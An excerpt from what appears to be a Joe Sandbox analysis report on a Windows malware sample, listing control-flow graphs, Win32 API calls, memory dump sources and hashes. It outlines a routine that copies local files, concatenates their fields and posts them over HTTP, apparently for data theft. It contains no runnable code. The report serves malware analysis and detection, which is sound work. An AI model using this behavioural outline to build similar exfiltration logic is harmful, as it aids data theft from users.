                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                              • String ID: ------$"$"$"$--$------$------$------$J&f
                                                                                                                                                                                                                              • API String ID: 2633831070-3705675087
                                                                                                                                                                                                                              • Opcode ID: 74493234c483f3658d59d402a436d2929cc6b9c7c557567d206e6107d0e6baac
                                                                                                                                                                                                                              • Instruction ID: 3b2782edbf40cedd773c0650a07a319f3ed05c79c24ff2984dda7e87394ba47c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74493234c483f3658d59d402a436d2929cc6b9c7c557567d206e6107d0e6baac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 598 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 613 4056d4-4056d8 598->613 614 4056cd 598->614 615 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 613->615 616 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 613->616 614->613 625 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 615->625 626 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 615->626 616->615 700 40585c-40586a 616->700 626->625 701 405878 700->701 702 40586c-405876 700->702 703 405882-4058b5 HttpOpenRequestA 701->703 702->703 704 405c63-405c6a InternetCloseHandle 703->704 705 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 703->705 704->615 814 405be2-405c0c InternetReadFile 705->814 815 405c17-405c5d InternetCloseHandle 814->815 816 405c0e-405c15 814->816 815->704 816->815 817 405c19-405c57 call 416fb0 call 416ea0 call 416e00 816->817 817->814
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02F61B90), ref: 004056C3
                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,02F61BE0,00000000,?,02F41E78,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,02F61B60,?,02F66870,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                              • String ID: "$"$------$------$------$-A$-A$J&f
                                                                                                                                                                                                                              • API String ID: 148854478-1022722094
                                                                                                                                                                                                                              • Opcode ID: 484756e9e2b122063d4cfba4e0ce3c57df42427b15e0e70858559e4d979600cf
                                                                                                                                                                                                                              • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 484756e9e2b122063d4cfba4e0ce3c57df42427b15e0e70858559e4d979600cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1271 40a030-40a04c call 417070 1274 40a05d-40a071 call 417070 1271->1274 1275 40a04e-40a05b call 416e20 1271->1275 1281 40a082-40a096 call 417070 1274->1281 1282 40a073-40a080 call 416e20 1274->1282 1280 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 1275->1280 1314 40a12d-40a134 1280->1314 1281->1280 1290 40a098-40a0b8 call 416e00 * 3 call 413220 1281->1290 1282->1280 1308 40a6cf-40a6d2 1290->1308 1315 40a170-40a184 call 416d40 1314->1315 1316 40a136-40a152 call 4170d0 * 2 CopyFileA 1314->1316 1321 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 1315->1321 1322 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 1315->1322 1329 40a154-40a16e call 416da0 call 415bd0 1316->1329 1330 40a16c 1316->1330 1380 40a319-40a331 call 4170d0 1321->1380 1322->1380 1329->1314 1330->1315 1389 40a680-40a692 call 4170d0 DeleteFileA call 417040 1380->1389 1390 40a337-40a355 1380->1390 1401 40a697-40a6ca call 417040 call 416e00 * 5 call 413220 1389->1401 1399 40a666-40a676 1390->1399 1400 40a35b-40a36f GetProcessHeap RtlAllocateHeap 1390->1400 1408 40a67d 1399->1408 1402 40a372-40a382 1400->1402 1401->1308 1409 40a601-40a60e lstrlen 1402->1409 1410 40a388-40a42a call 416d40 * 6 call 417070 1402->1410 1408->1389 1412 40a610-40a642 lstrlen call 416da0 call 401500 call 404dc0 1409->1412 1413 40a655-40a663 memset 1409->1413 1450 40a42c-40a43b call 416e20 1410->1450 1451 40a43d-40a446 call 416e20 1410->1451 1428 40a647-40a650 call 416e00 1412->1428 1413->1399 1428->1413 1455 40a44b-40a45d call 417070 1450->1455 1451->1455 1458 40a470-40a479 call 416e20 1455->1458 1459 40a45f-40a46e call 416e20 1455->1459 1463 40a47e-40a48e call 4170b0 1458->1463 1459->1463 1466 40a490-40a498 call 416e20 1463->1466 1467 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6 1463->1467 1466->1467 1467->1402
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2228671196-0
                                                                                                                                                                                                                              • Opcode ID: f038a46a859a89ab1135c2a40355bd4fe71db6198e962a5605bbf1e7f4cfc534
                                                                                                                                                                                                                              • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f038a46a859a89ab1135c2a40355bd4fe71db6198e962a5605bbf1e7f4cfc534
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1973479514-0
                                                                                                                                                                                                                              • Opcode ID: 10f8d54376e3b5367ee62ddff68a19014b5296cf016c591a8fccde4daf0e2bb0
                                                                                                                                                                                                                              • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10f8d54376e3b5367ee62ddff68a19014b5296cf016c591a8fccde4daf0e2bb0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1666 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1681 404604 1666->1681 1682 40460b-40460f 1666->1682 1681->1682 1683 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1682->1683 1684 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 1682->1684 1683->1684 1770 404793-404797 1683->1770 1694 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 1684->1694 1695 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 1684->1695 1695->1694 1771 4047a5 1770->1771 1772 404799-4047a3 1770->1772 1773 4047af-4047e2 HttpOpenRequestA 1771->1773 1772->1773 1774 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 1773->1774 1775 404b7e-404b85 InternetCloseHandle 1773->1775 1886 404af2-404b1c InternetReadFile 1774->1886 1775->1684 1887 404b27-404b79 InternetCloseHandle call 416e00 1886->1887 1888 404b1e-404b25 1886->1888 1887->1775 1888->1887 1889 404b29-404b67 call 416fb0 call 416ea0 call 416e00 1888->1889 1889->1886
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02F61B90), ref: 004045FA
                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,02F61BA0), ref: 00404AA8
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,02F61B60,?,02F66870,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                              • String ID: "$"$------$------$------$J&f
                                                                                                                                                                                                                              • API String ID: 460715078-2398766951
                                                                                                                                                                                                                              • Opcode ID: 9906fb4f6b3fd350b932ca2aec9f76456412fdc8bcd13fd916d3f7d5b5d7eb5b
                                                                                                                                                                                                                              • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9906fb4f6b3fd350b932ca2aec9f76456412fdc8bcd13fd916d3f7d5b5d7eb5b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

